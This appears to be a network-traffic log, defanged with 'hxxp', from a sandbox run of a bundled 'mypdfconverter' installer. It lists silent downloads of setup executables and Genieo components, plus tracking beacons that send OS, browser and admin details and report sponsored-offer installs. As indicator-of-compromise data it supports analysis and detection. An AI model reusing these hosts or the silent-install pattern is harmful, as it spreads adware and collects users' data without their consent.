hxxp://www.google.com/ads/conversion/1003450607/?random=251257950&cv=7&fst=1422513975534&num=1&fmt=2&value=0&label=YJ0zCNGY5gEQ7-G93gM&bg=FFFFFF&hl=fr&guid=ON&u_h=902&u_w=1916&u_ah=858&u_aw=1916&u_cd=24&u_his=1&u_tz=120&u_java=true&u_nplug=0&u_nmime=0&frm=0&url=http://www.mypdfconverter.com/en/software/install/?campaign=14765&eme=×tamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1&vis=1&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=455578018 | 173.194.113.212 |
hxxp://www.google.com.ua/ads/conversion/1003450607/?random=251257950&cv=7&fst=1422513975534&num=1&fmt=2&value=0&label=YJ0zCNGY5gEQ7-G93gM&bg=FFFFFF&hl=fr&guid=ON&u_h=902&u_w=1916&u_ah=858&u_aw=1916&u_cd=24&u_his=1&u_tz=120&u_java=true&u_nplug=0&u_nmime=0&frm=0&url=http://www.mypdfconverter.com/en/software/install/?campaign=14765&eme=×tamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1&vis=1&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=455578018&ipr=y | 173.194.113.215 |
hxxp://d.addelive.com/widget/render/hash/a15f4808afa7ee780ddce01e1b0c543d | 66.216.109.248 |
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w= | |
hxxp://counter-817696455.us-east-1.elb.amazonaws.com/blank.gif?t=143985159011&h=a15f4808afa7ee780ddce01e1b0c543d&emp=1 | |
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAxNF3PJUX7iAOhAP2oGxcI= | |
hxxp://app.mypdfconverter.com/images/favicon.ico | 178.33.88.173 |
hxxp://e6845.ce.akamaiedge.net/pca3.crl | |
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ/xkCfyHfJr7GQ6M658NRZ4SHo/AQUCPVR6Pv+PT1kNnxoz1t4qN+5xTcCEGC2x6sSmevembHfY1acIZk= | |
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEGwkCSV07gf3g5QOsqmf+MY= | |
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEEES5jLHsYoCmjofrIA6uJ8= | |
hxxp://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s= | 178.255.83.1 |
hxxp://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRtl6lMY2+iPob4twryIF+FfgUdvwQUK8NGq7oOyWUqRtF5R8Ri4uHa/LgCEBBwnU/1VAjXMGAB2OqRdbs= | 178.255.83.1 |
hxxp://ocsp.usertrust.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG+EAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQCEHQmdFrc480Fy/u/h0ldP | 178.255.83.1 |
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD/yl6nWPkczAQUe1tFz6/Oy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS+zcBkvzl4= | |
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9+WQCtWAQU1A1lP3q9NMb+R+dMDcC98t4Vq3ECEBuYvHdVmNDEAeDWzENJUpo= | |
hxxp://dl.ourclientinputsrv.com/smt2b/all/hat/row/setup.exe_c | 69.16.175.42 |
hxxp://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl | 88.221.133.16 |
hxxp://bi.bisrv.com/pinger?event_type=offer_accepted&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=appshat_madness&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=3&index_in_screen=1&index_in_session=3&0.7870902808395388 | |
hxxp://dl.ourclientinputsrv.com/smt2b/all/hat/row/setup.exe_b | 69.16.175.42 |
hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1422513850 | 54.231.0.212 |
hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1422513853 | 54.231.0.212 |
hxxp://as.perfcreatives.com/eas?cu=25386&eme=WBrHTc5N | 178.33.88.164 |
hxxp://www.mypdfconverter.com/en/software/install/?campaign=14765&eme=×tamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1 | 178.33.88.175 |
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w= | 23.43.139.27 |
hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=700&n=deploy_ch_start_funnel_step_name&rnd=1422513835 | 54.231.0.212 |
hxxp://bi.bisrv.com/pinger?event_type=install_start&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=sourceapp_b2b&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=2&index_in_screen=1&index_in_session=2&0.20616356933149288 | |
hxxp://install.sourceapp.info/ii?alpha=eidVXnYRaD9QRktAenR5e2MGU3Z6e1l2e08UQU8zKHsfGTNvVjZ3XTo2HClnZicJTV84KG9RNmYgARxgfmwrVh4WJxVGdCltGhguR3ZMcyl4OhZePC91DSIACUpWHRx9a3w7di5GUS8aCng7LiIkLFh9eHpZPCpAZSd2AHYiNCRdFlIoFUJxLmVDWj0ELz0ydjo/Vw08OHdWUDRTRA5JIjwqVgomOQ8Afmo6Oi9VJiYvUBUDeFE7QjVgJAYDdigndiJfRyhyIWZ0OAcSY1MqRGkqbGQUTDZ8JAQ/JFUNQUMpOiNLRQ52CBd3WyczDUhAf28EVE05QTxMVCR+UlcjPCt2AFFINWlSYG0uARh6WXkzOmQ+JVIRLWoiATI1WQsRRTkpZkkZIHRLXzgZZmVfB2R6YA5cBw8PbABtJXkUGgUhK20LVARGUxM0fjhaTX1AKicmKjp7XkY8PWQNK3YQSFcefCEnBEhzJV5VIh1+b0tZLSYwWgwObAV/UVIbZlVANWNiTyNHRWdCUhZyOQceclo3QCAXS1gqH141YVsyAlkPDk8/aiNXG34uTR8lGV86FQdSeWM= | 70.186.131.141 |
hxxp://counter.d.addelive.com/blank.gif?t=143985159011&h=a15f4808afa7ee780ddce01e1b0c543d&emp=1 | 184.73.212.92 |
hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?52d20c74d0048ebb | 88.221.132.223 |
hxxp://www.mypdfconverter.com/images/favicon.ico | 178.33.88.175 |
hxxp://www.googleadservices.com/pagead/conversion/1003450607/?random=1422513975534&cv=7&fst=1422513975534&num=1&fmt=2&value=0&label=YJ0zCNGY5gEQ7-G93gM&bg=FFFFFF&hl=fr&guid=ON&u_h=902&u_w=1916&u_ah=858&u_aw=1916&u_cd=24&u_his=1&u_tz=120&u_java=true&u_nplug=0&u_nmime=0&frm=0&url=http://www.mypdfconverter.com/en/software/install/?campaign=14765&eme=×tamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1&vis=1 | 173.194.113.218 |
hxxp://download.genieo.com/partner/gim394750002/release/live/partner_manifest.xml | 54.231.244.1 |
hxxp://bi.bisrv.com/pinger?event_type=offer_accepted&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=geneio_non_search_for_pc&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=4&index_in_screen=1&index_in_session=4&0.7410277599261255 | |
hxxp://www.google-analytics.com/r/__utm.gif?utmwv=5.6.2&utms=2&utmn=725233049&utmhn=www.mypdfconverter.com&utmcs=utf-8&utmsr=1916x902&utmvp=1173x539&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=-&utmdt=Congratulations!&utmhid=1331959245&utmr=-&utmp=/en/software/install/?campaign=14765&eme=×tamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1&utmht=1422513975648&utmac=UA-12585577-50&utmcc=__utma=14348971.1072120561.1422513976.1422513976.1422513976.1;+__utmz=14348971.1422513976.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmjid=1037776761&utmredir=1&utmmt=1&utmu=rACgAAAAAAAAAAAAAAAAAAAE~ | 173.194.113.192 |
hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=900&n=deploy_ff_start_funnel_step_name&rnd=1422513836 | 54.231.0.212 |
hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1422513835 | 54.231.0.212 |
hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=500&n=deploy_notification_start_funnel_step_name&rnd=1422513835 | 54.231.0.212 |
hxxp://download.genieo.com/partner/gim394750002/release/r16741/genieo_setup.gen | 54.231.244.1 |
hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b77e166e5d8add6a | 88.221.132.223 |
hxxp://www.mypdfconverter.com/en/software/pixel?campaign=14765&eme=×tamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1&ua=Internet Explorer 10.0&sys=Windows 7&cookie=-1 | 178.33.88.175 |
hxxp://stats.ourclientinputsrv.com/installer.gif?action=finished&app=65743&appver=21&ver=1_36_01_22&version_date=15-01-29&bic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&upi=d5d8d8a61601751d467a5854a16ce35a&procid=0636C86E452B4A66857E1D1F9F48A1BAPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=35.0.1916.153&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_21&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=85899350025&asw=0&asw2=1073750533&asw3=-2147483648&asw4=0&crtnm=ColoColoApps&ieprofiles=1&chprofiles=na&ffprofiles=1&procstarttime=1422513827&procruntime=28&rnd=1422513855 | 54.231.16.188 |
hxxp://crl.verisign.com/pca3.crl | 23.43.133.163 |
hxxp://crl.microsoft.com/pki/crl/products/WinPCA.crl | 88.221.133.16 |
hxxp://bi.bisrv.com/pinger?event_type=install_complete&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=geneio_non_search_for_pc&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=4&index_in_screen=1&index_in_session=4&0.30974286226175074 | |
hxxp://bi.bisrv.com/pinger?event_type=install_complete&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=appshat_madness&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=3&index_in_screen=1&index_in_session=3&0.28958118764499907 | |
hxxp://www.googleadservices.com/pagead/conversion.js | 173.194.113.218 |
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEGwkCSV07gf3g5QOsqmf+MY= | 23.43.139.27 |
hxxp://googleads.g.doubleclick.net/pagead/viewthroughconversion/1003450607/?random=251257950&cv=7&fst=1422513975534&num=1&fmt=2&value=0&label=YJ0zCNGY5gEQ7-G93gM&bg=FFFFFF&hl=fr&guid=ON&u_h=902&u_w=1916&u_ah=858&u_aw=1916&u_cd=24&u_his=1&u_tz=120&u_java=true&u_nplug=0&u_nmime=0&frm=0&url=http://www.mypdfconverter.com/en/software/install/?campaign=14765&eme=×tamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1&vis=1&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0 | 173.194.113.217 |
hxxp://logs.ourclientinputsrv.com/monetization.gif?event=4&ibic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&campaign=000820&country=ua&app=65743&os=7(64bit)&defbro=ie&chver=35.0.1916.153&ffver=29.0.1&iever=10.0.9200.16521&starttime=1422513827&asw=0_1073750533_-2147483648_0&browser=ff,ie,de&rnd=1422513827 | 69.16.175.42 |
hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=800&n=deploy_nova_start_funnel_step_name&rnd=1422513836 | 54.231.0.212 |
hxxp://stats.ourclientinputsrv.com/apps.gif?action=install&app=65743&appver=21&ver=1_36_01_22&version_date=15-01-29&bic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&upi=d5d8d8a61601751d467a5854a16ce35a&procid=0636C86E452B4A66857E1D1F9F48A1BAPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=35.0.1916.153&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&installtime=1422513827&lifetime=0&silent=1&crtnm=ColoColoApps&procstarttime=1422513827&procruntime=28&rnd=1422513855 | 54.231.16.188 |
hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1422513842 | 54.231.0.212 |
hxxp://dl.ourclientinputsrv.com/smt2b/all/hat/row/setup.exe_e | 69.16.175.42 |
hxxp://bi.bisrv.com/pinger?event_type=install_start&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=mystartsearch&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=1&index_in_screen=1&index_in_session=1&0.3823084710495085 | |
hxxp://www.mypdfconverter.com/images/congratsBg.jpg | 178.33.88.175 |
hxxp://js.ourclientinputsrv.com/plugin/apps/65743/manifest/1_36_01_22/ie10/manifest.xml?ver=21&rnd=6562 | 69.16.175.10 |
hxxp://dl.newinputinfoservice.com/smt2b/all/hat/row/setup.exe | 69.16.175.10 |
hxxp://www.google-analytics.com/r/__utm.gif?utmwv=5.6.2&utms=1&utmn=40022683&utmhn=www.mypdfconverter.com&utmcs=utf-8&utmsr=1916x902&utmvp=1173x539&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=-&utmdt=Congratulations!&utmhid=1331959245&utmr=-&utmp=/0812929127/goal&utmht=1422513975626&utmac=UA-15433929-1&utmcc=__utma=14348971.1072120561.1422513976.1422513976.1422513976.1;+__utmz=14348971.1422513976.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmjid=1198134741&utmredir=1&utmu=qACgAAAAAAAAAAAAAAAAAAAE~ | 173.194.113.192 |
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEF1tL3zAt8MdpkWloaIHgTk= | 23.43.139.27 |
hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1422513835 | 54.231.0.212 |
hxxp://stats.ourclientinputsrv.com/installer.gif?action=started&app=65743&appver=0&ver=1_36_01_22&version_date=15-01-29&bic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&upi=d5d8d8a61601751d467a5854a16ce35a&procid=0636C86E452B4A66857E1D1F9F48A1BAPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=35.0.1916.153&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_21&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=85899350025&asw=0&asw2=1073750533&asw3=-2147483648&asw4=0&crtnm=ColoColoApps&procstarttime=1422513827&procruntime=4&rnd=1422513831 | 54.231.16.188 |
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEEES5jLHsYoCmjofrIA6uJ8= | 23.43.139.27 |
hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=300&n=deploy_start_funnel_step_name&rnd=1422513832 | 54.231.0.212 |
hxxp://bi.bisrv.com/pinger?event_type=offer_accepted&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=sourceapp_b2b&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=2&index_in_screen=1&index_in_session=2&0.4314217413277596 | |
hxxp://www.appshat.com/images/64x64.ico | 173.194.71.121 |
hxxp://as.perfcreatives.com/eas?cu=5600;ty=pc | 178.33.88.164 |
hxxp://download.genieo.com/core/release/r16741/framework_setup.gen | 54.231.244.1 |
hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=200&n=init_end_funnel_step_name&rnd=1422513832 | 54.231.0.212 |
hxxp://www.appshat.com/images/16x16.ico | 173.194.71.121 |
hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1422513842 | 54.231.0.212 |
hxxp://dl.ourclientinputsrv.com/smt2b/all/hat/row/setup.exe_a | 69.16.175.42 |
hxxp://www.google-analytics.com/ga.js | 173.194.113.192 |
hxxp://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9+WQCtWAQU1A1lP3q9NMb+R+dMDcC98t4Vq3ECEBuYvHdVmNDEAeDWzENJUpo= | 23.43.139.27 |
hxxp://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl | 88.221.133.16 |
hxxp://bi.bisrv.com/pinger?event_type=install_complete&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=mystartsearch&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=1&index_in_screen=1&index_in_session=1&0.4327788826737436 | |
hxxp://js.ourclientinputsrv.com/plugin/apps/65743/manifest/1_36_01_22/ie10/manifest.xml?ver=21&rnd=6787 | 69.16.175.10 |
hxxp://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD/yl6nWPkczAQUe1tFz6/Oy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS+zcBkvzl4= | 23.43.139.27 |
hxxp://www.mypdfconverter.com/images/myPDFconverter.png | 178.33.88.175 |
hxxp://bi.bisrv.com/pinger?event_type=offer_shown&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=appshat_madness&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=3&index_in_screen=1&index_in_session=3&display_height=90&0.8723355811491985 | |
hxxp://analytics.genieo.com/track?uid={E8BFA998-168D-400E-B9E0-F41B76A5DFC7}&partner=gim394750002&data=updater_ping=&revision_core=0&revision_updater=0&revision_partner=0&os_version=Microsoft Windows 7 Professional Service Pack 1 (build 7601), 64-bit&java_version=1.6 | 64.233.165.121 |
hxxp://install.sourceapp.info/fp?alpha=eidVXnZYX00SEgEPenR5e2MGU3Z6e0MvN10mFEEqfTNYXjB4VlVeHXtkSC4mO0QjDgtnVTxeRntTcgdiYnpfLAAcImE2cy0JQU1gX3MuU2k5JlYSKG0/AipzBElVHGN/cxRKcipdXCEafWBJRSQgNFgKCXtZO1gpZyEEAHYtMXdTZmliRgAlNn5FSydSNyswZGk7Qwh7fHMIMnMNWVFJdy1/GUt3P1pVOB5xdRtaN3U2QFleagU5SmY7LGRaPyoscBYQcHBEGi50JxwMelNkM0wQTC0BTX5hIAAjdwxPVx58LTVVRRR2BQF3Xzt1PQ1xc28EXkgUHThVN2ImBjh2OjdwCg1lJR9CdF9+RUZSDiBSLXJNPlISW2UhBD93DE9ebmgPcXs8By0dRA87ZQEI | 70.186.131.141 |
hxxp://www.bigspeedpro.com/webplayer/appshat/config.json | 78.138.126.82 |
hxxp://bi.bisrv.com/pinger?event_type=install_start&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=appshat_madness&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=3&index_in_screen=1&index_in_session=3&0.23028674511194408 | |
hxxp://download.genieo.com/core/release/r16741/manifest.xml | 54.231.244.1 |
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c= | 23.43.139.27 |
hxxp://install.sourceapp.info/mg?alpha=SVwbaBdSRnpqbQtkNEIYdhVZexIXcRo5YFIuSQ== | 70.186.131.141 |
hxxp://download.genieo.com/core/release/r16741/updater_manifest.xml | 54.231.244.1 |
hxxp://stats.ourclientinputsrv.com/stats.gif?action=daily&app=65743&bic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&ver=1_36_01_22&installtime=1422513827&os=7&browser=ie&browserver=10&ffver=29&chromever=35&srcid=000820&subid=0&zdata=appshatmadness&appver=21&bgver=1&pluginsver=17&curtime=1422513849&lifetime=22&rnd=6039 | 54.231.16.188 |
hxxp://bi.bisrv.com/pinger?event_type=install_fail&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=sourceapp_b2b&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=2&index_in_screen=1&index_in_session=2&0.005616250394906319 | |
hxxp://install.sourceapp.info/mg?alpha=Q2QKaQJ6JUg3MX9TJUMNQiBZZAJDIggYAkMPCyofMzRLCnQTGRcba0NUCx0lGnASNAgxEmxsNithXUcWUGwwZHc7MxYmCRNSQzZrVi9y | 70.186.131.141 |
hxxp://bi.bisrv.com/pinger?event_type=install_start&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=geneio_non_search_for_pc&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=4&index_in_screen=1&index_in_session=4&0.6194686390575159 | |
hxxp://as.perfcreatives.com/pixel.gif | 178.33.88.164 |
hxxp://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl | 88.221.133.16 |
hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=100&n=init_start_funnel_step_name&rnd=1422513827 | 54.231.0.212 |
hxxp://bi.bisrv.com/pinger?event_type=offer_shown&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=geneio_non_search_for_pc&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=4&index_in_screen=1&index_in_session=4&display_height=75&0.7763572020438432 | |
hxxp://download.genieo.com/core/release/r16741/trayapp_setup.gen | 54.231.244.1 |
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAxNF3PJUX7iAOhAP2oGxcI= | 23.43.139.27 |
hxxp://www.mypdfconverter.com/images/pixel.gif | 178.33.88.175 |
hxxp://www.appshat.com/home | 173.194.71.121 |
hxxp://logs.ourclientinputsrv.com/monetization.gif?event=3&ibic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&campaign=000820&country=ua&app=65743&os=7(64bit)&defbro=ie&chver=35.0.1916.153&ffver=29.0.1&iever=10.0.9200.16521&starttime=1422513827&asw=0_1073750533_-2147483648_0&browser=ff,ie,de&rnd=1422513827 | 69.16.175.42 |
hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=10000&n=deploy_end_funnel_step_name&rnd=1422513853 | 54.231.0.212 |
